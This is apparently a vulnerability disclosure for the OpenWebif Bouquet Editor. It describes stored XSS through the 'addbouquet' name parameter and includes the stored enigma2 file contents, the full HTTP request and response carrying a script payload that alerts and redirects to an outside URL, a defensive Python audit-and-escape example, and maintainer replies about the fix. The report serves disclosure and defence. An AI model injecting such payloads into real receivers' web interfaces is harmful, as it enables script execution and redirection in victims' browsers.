Description Inserting JavaScript code into the "Add Bouquet" function in the Bouquet Editor leads to Stored XSS. The payload in the PoC executes each time the user goes to the OWIF interface and redirects to a different webpage.
PoC/Reproduction Link to streamable
Desktop
Stored userbouquets
```
$ cat /etc/enigma2/userbouquet._script_alert_document_domain__window_location_replace__https___github_com_kozmer_____script___tv_.tv
#NAME <script>alert(document.domain);window.location.replace("https://github.com/kozmer");</script> (TV)
$ cat /etc/enigma2/bouquets.tv
#NAME Bouquets (TV)
#SERVICE 1:7:1:0:0:0:0:0:0:0:FROM BOUQUET "userbouquet.favourites.tv" ORDER BY bouquet
#SERVICE 1:7:1:0:0:0:0:0:0:0:FROM BOUQUET "userbouquet._script_alert_document_domain__window_location_replace__https___github_com_kozmer_____script___tv_.tv" ORDER BY bouquet
```
Request
```
GET /bouqueteditor/api/addbouquet?name=%3Cscript%3Ewindow.location.replace(%22https%3A%2F%2Fgithub.com%2Fkozmer%22)%3B%3C%2Fscript%3E&mode=0&_=1628087265204 HTTP/1.1
Host: 192.168.0.22
User-Agent: Mozilla/5.0 (Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Referer: http://192.168.0.22/
Cookie: TWISTED_SESSION=<removed>
Sec-GPC: 1

HTTP/1.1 200 OK
Date: Wed, 04 Aug 2021 13:28:22 GMT
Connection: close
Content-Type: text/plain
Server: TwistedWeb/16.4.0
Content-Length: 116

{"Result": [true, "Bouquet <script>window.location.replace(\"https://github.com/kozmer\");</script> (TV) created."]}
```
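The report shows the bouquet name being stored verbatim in the enigma2 `#NAME` line and later rendered by the web UI. The following is an added example (not OpenWebif's own code) that parses the bouquet file layout shown above, audits stored names for HTML-active characters, and renders the list with output escaping; the file contents are constructed samples and the function names are hypothetical.

```python
import html
import re
from typing import Dict, List

# Constructed sample of the two enigma2 file kinds shown in the report
# (inline sample input, not read from a real receiver).
BOUQUETS_TV = (
    "#NAME Bouquets (TV)\n"
    '#SERVICE 1:7:1:0:0:0:0:0:0:0:FROM BOUQUET "userbouquet.favourites.tv" ORDER BY bouquet\n'
    '#SERVICE 1:7:1:0:0:0:0:0:0:0:FROM BOUQUET "userbouquet.evil.tv" ORDER BY bouquet\n'
)
USERBOUQUETS = {
    "userbouquet.favourites.tv": "#NAME Favourites (TV)\n",
    "userbouquet.evil.tv": "#NAME <script>alert(document.domain);</script> (TV)\n",
}

FROM_BOUQUET = re.compile(r'FROM BOUQUET "([^"]+)"')


def list_userbouquets(index_text: str) -> List[str]:
    """Return the userbouquet file names referenced by a bouquets.tv index."""
    names = []
    for line in index_text.splitlines():
        match = FROM_BOUQUET.search(line)
        if line.startswith("#SERVICE") and match:
            names.append(match.group(1))
    return names


def bouquet_name(file_text: str) -> str:
    """Return the raw #NAME value of a userbouquet file ('' if absent)."""
    for line in file_text.splitlines():
        if line.startswith("#NAME "):
            return line[len("#NAME "):]
    return ""


def suspicious(name: str) -> bool:
    """True if a stored name contains characters a browser treats as markup."""
    return any(c in name for c in "<>\"'&")


def audit(index_text: str, files: Dict[str, str]) -> Dict[str, str]:
    """Map each referenced file whose #NAME looks like injected markup to that name."""
    found = {f: bouquet_name(files.get(f, "")) for f in list_userbouquets(index_text)}
    return {f: n for f, n in found.items() if suspicious(n)}


def render_list(index_text: str, files: Dict[str, str]) -> str:
    """Build bouquet-list markup, escaping every name so it renders as text."""
    items = [html.escape(bouquet_name(files.get(f, "")), quote=True)
             for f in list_userbouquets(index_text)]
    return "<ul>" + "".join("<li>%s</li>" % i for i in items) + "</ul>"
```

Escaping at render time protects every page that shows the name; the same check in `suspicious` can also reject or encode the `name` parameter at the `addbouquet` endpoint before the file is written.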
Does Twisted have a lib to sanitise all:
Prevent XSS / #1387
4d2c8ad
Many thanks .. please check the latest version